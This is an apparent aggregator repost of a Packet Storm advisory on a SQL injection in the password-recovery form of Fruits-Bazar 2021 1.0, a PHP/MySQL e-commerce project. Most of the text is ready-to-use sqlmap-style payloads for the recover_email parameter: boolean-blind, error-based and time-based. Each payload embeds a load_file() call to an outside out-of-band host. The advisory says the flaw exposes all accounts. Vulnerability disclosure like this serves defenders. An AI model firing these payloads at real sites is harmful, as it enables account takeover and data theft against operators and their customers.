Security
Headlines
HeadlinesLatestCVEs

Headline

Fruits-Bazar 2021 1.0 SQL Injection

Fruits-Bazar 2021 version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#git#php#auth
## Title: Fruits-Bazar 2021 v1.0 SQLi## Author: nu11secur1ty## Date: 06.29.2022## Vendor: https://github.com/creativesaiful## Software: https://github.com/creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar## Description:The recover_email parameter appears to be vulnerable to SQL injection attacks.The attacker can take access to all accounts on this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: recover_email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@[email protected]'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@[email protected]\\olg'))+''OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@[email protected]'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@[email protected]\\olg'))+''AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'Mvga'='Mvga&u_pass_recover=Recover Password    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@[email protected]'+(selectload_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@[email protected]\\olg'))+''AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND'qfSm'='qfSm&u_pass_recover=Recover Password---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Md-Saiful-Islam-creativesaiful/2021/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)## Proof and Exploit:[href](https://streamable.com/ngodwj)-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Packet Storm: Latest News

Pyload Remote Code Execution